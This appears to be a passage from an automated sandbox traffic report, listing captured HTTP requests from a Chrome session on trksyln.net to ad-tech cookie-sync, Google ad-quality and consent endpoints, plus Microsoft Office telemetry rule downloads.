en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cookie-sync/adx?google_gid=CAESENLpOVFDHsC-VfNLaLRul-w&google_cver=1&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5&_bee_ppp=1 HTTP/1.1Host: match.prod.bidr.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: checkForPermission=ok
Source: global traffic	HTTP traffic detected: GET /track/cmb/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=d1b817e5-56c5-45f4-864e-634d6431975b; TDCPM=CAEYBSgCMgsI-O_s4-n4vD0QBTgB
Source: global traffic	HTTP traffic detected: GET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1Host: widget.us.criteo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&_bee_ppp=1 HTTP/1.1Host: match.prod.bidr.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: checkForPermission=ok
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxUB99RlJ_8i7LLI3oNTdMLmCw2CQVqckIxJK9gf-02-WMpmqGqaY-w86Dc5gRTrOlzGhRgGU2qqZ_W1MTy0YY21viTL3rQc18HIx6JgnCbhVFUEjsqMaMITOmSLmaXPdGl8WFcYzw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4Nzc1LDY4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNSw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXSxbMTgsIltbWzFdXV0iXSxbMiwiW251bGwsW251bGwsMSxbMTczMDM5ODc3NCwyNjUzNTkwMDBdXV0iXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0; __gads=ID=306266a9c2348d29:T=1730398769:RT=1730398769:S=ALNI_Mbbw868vcgtQoLBWAGr_Cg5L1s2aA; __gpi=UID=00000f481e63bcec:T=1730398769:RT=1730398769:S=ALNI_Ma2HfWNKb2HbqWiBFztPiWyAdupEA; __eoi=ID=c1a37bea35cc93c0:T=1730398769:RT=1730398769:S=AA-AfjY72W63xu-aXyCL3e10qgJe; FCNEC=%5B%5B%22AKsRol9oUVcMXiFoqzkj1NEa08EJHnvQLU1QPHYF1L1Ozn0rxWlj1OU96qI8aKh50hz1fmLcU4sYmGwr3wGXMgFDvn_e8490-tvoBSDRIEcmLYrwc8BRbcmqmEeBeHgdMPnNSa3lMVW3T4Tr1qq5ui7eaUI39kjUvQ%3D%3D%22%5D%2Cnull%2C%5B%5B2%2C%22%5Bnull%2C%5Bnull%2C1%2C%5B1730398774%2C265359000%5D%5D%5D%22%5D%5D%5D
Source: global traffic	HTTP traffic detected: GET /getconfig/sodar?sv=200&tid=gda&tv=r20241028&st=env HTTP/1.1Host: ep1.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://trksyln.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxUGL8xOsRaRP5PFyweqWIg8FLUl9Kj6bzVgUHc3lpUPZXC03phBxzVHNadhsFw6_SzGM2DcFUpr-aQhK_YmXtMeNnbqjjF6RvqMXAXnOY2uUuOqYG08zgv8dhrK8dARDb02qTW72dksb9BfH6gYBeExaqhirVZfYVfltGg-pJlYyh4-ZwVEQ-1y8o4E/_/googlempu.-scrollads.-banner-ad.=display_ad&_ads_iframe_ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1 HTTP/1.1Host: odr.mookie1.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1Host: widget.us.criteo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /i/ca-pub-9495854422341365?href=https%3A%2F%2Ftrksyln.net%2FError&ers=2 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxXE0rdt5cwklf9PRBqqi8rFncdilTmLVYbRCmgcYEIr_h6aXnlDVbYl8-Mw69k26WrMfK2ANMfR9tO7b_s5NhLr9ZNkM_vAqZxxWuutweCz4t4EvQ7RPeu7lVUr28c-H-5-bioZAg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzcyLDU3NDAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl1dXQ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxVliFzt__e0MUU_SOrGx-lhlS6uQAPdw7fuvmC9ZOEsgVNDhFt6QsFFNlaOQwy5PSsxhxcDWnH1x8vkCo4uTDzz2qaGDiiWUxEb4DdVXaVIkxYLejIwjKuC0DHCYaFx6xUnkqAxgw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzczLDk4NTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNV0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl0sWzIsIltudWxsLFtudWxsLDEsWzE3MzAzOTg3NzQsMjY1MzU5MDAwXV1dIl1dXQ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxUB99RlJ_8i7LLI3oNTdMLmCw2CQVqckIxJK9gf-02-WMpmqGqaY-w86Dc5gRTrOlzGhRgGU2qqZ_W1MTy0YY21viTL3rQc18HIx6JgnCbhVFUEjsqMaMITOmSLmaXPdGl8WFcYzw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4Nzc1LDY4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNSw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXSxbMTgsIltbWzFdXV0iXSxbMiwiW251bGwsW251bGwsMSxbMTczMDM5ODc3NCwyNjUzNTkwMDBdXV0iXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sodar/sodar2.js HTTP/1.1Host: ep2.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /getconfig/sodar?sv=200&tid=gda&tv=r20241028&st=env HTTP/1.1Host: ep1.adtrafficquality.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trksyln.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0; __gads=ID=306266a9c2348d29:T=1730398769:RT=1730398769:S=ALNI_Mbbw868vcgtQoLBWAGr_Cg5L1s2aA; __gpi=UID=00000f481e63bcec:T=1730398769:RT=1730398769:S=ALNI_Ma2HfWNKb2HbqWiBFztPiWyAdupEA; __eoi=ID=c1a37bea35cc93c0:T=1730398769:RT=1730398769:S=AA-AfjY72W63xu-aXyCL3e10qgJe; FCNEC=%5B%5B%22AKsRol9oUVcMXiFoqzkj1NEa08EJHnvQLU1QPHYF1L1Ozn0rxWlj1OU96qI8aKh50hz1fmLcU4sYmGwr3wGXMgFDvn_e8490-tvoBSDRIEcmLYrwc8BRbcmqmEeBeHgdMPnNSa3lMVW3T4Tr1qq5ui7eaUI39kjUvQ%3D%3D%22%5D%2Cnull%2C%5B%5B2%2C%22%5Bnull%2C%5Bnull%2C1%2C%5B1730398774%2C265359000%5D%5D%5D%22%5D%5D%5D
Source: global traffic	HTTP traffic detected: GET /sodar/sodar2/232/runner.html HTTP/1.1Host: ep2.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/aframe HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sodar/sodar2.js HTTP/1.1Host: ep2.adtrafficquality.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pagead/sodar?id=sodar2&v=232&t=2&li=gda_r20241028&jk=2973902258960805&bg=!AwClAE_NAAbaVSD0-lU7ADQBe5WfOOSEgobHspmagji4Y34gS8GJxK4N_jAIGL6FgE-DDSuV5fNfn28dWYbLGun4_afSAgAAATRSAAAADGgBB34ANg_X2_piADoLfOqQQOA8NQKwAekuWzLVSuvoZLdd9eSdIJhrEzYRQYrSQVNS4YxqZD2N3GDoJJkCi95yxmhkSPeChUOagxj1MFy128Rv2EjffhT3l0gLNc43dHQBfjHco6DJRljtjnyAJIbprnUdZt1_KyspGIAxKfF7p61aOLOh6u3TF5-FQl3df5efpW3A_hU2Plmm-xpsCfkGwUsglHrOVnxxTO3ozIS5Xzqi6WG9lBvCiiyCSYTli35DUgxD9AzLi5TOpENxVcEnsCNL1IOalk2WQTvxulNxnzaL1p7kRztXT3PPhFXb_EYwZFPYUe0I6SS6_klRTkwcXvcTzTkgjqklzI62G4vqfgXSa0XSIcOCOoxDV0KPvId1x6eSFQouSf-0QkhZti772W9DUIknqtPAYLXuwfemZpxLt-Ep9WMfkI4aEdYO24YcOhF9Touj1m1lMPcP6lHuexteUdlxGoFUWDzY8WUE6ntRHFmCDTsyZSK2GVSDb8qM1RpgokmVxrp2JAEwo5Q60GcbC7Ez-tU64s0CGfYIfZa3SPMzPnK53cbZLwygjd7foVHdYKhPb6uU9KBgrr_G6q63CkdVOpuiAAdpkoQYwEHw9Qjdxo2IOMFVYKUtGwblDooJHK4k014izc_yji9Va9fyJLOaKHBiXvm1Yv8ZIcee5tHO6B4yCOPCAqaHmjA4YEd7G1iUDV-6SZPKRAsfigzzW8_h2soSKvx1cemtz-dQkfTHaIEOgRD5nigJZioZR9U5t7mGUUHwMMFtPNj38Y_PUytjC_UXE9oGOLui9DttgCsPIf-FLgD48-SRfhuU4lM4vUwkXd5TH2rLE0h7b8z7odJjp4Qc9pt2dRjVZub5jEJqHLQlwrxENKaRtru-nhvHeyO4zfD-uOnKM20HdMLGvX8dvlO36pj0ec1TZ3s0EvjoD27i-w HTTP/1.1Host: ep1.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
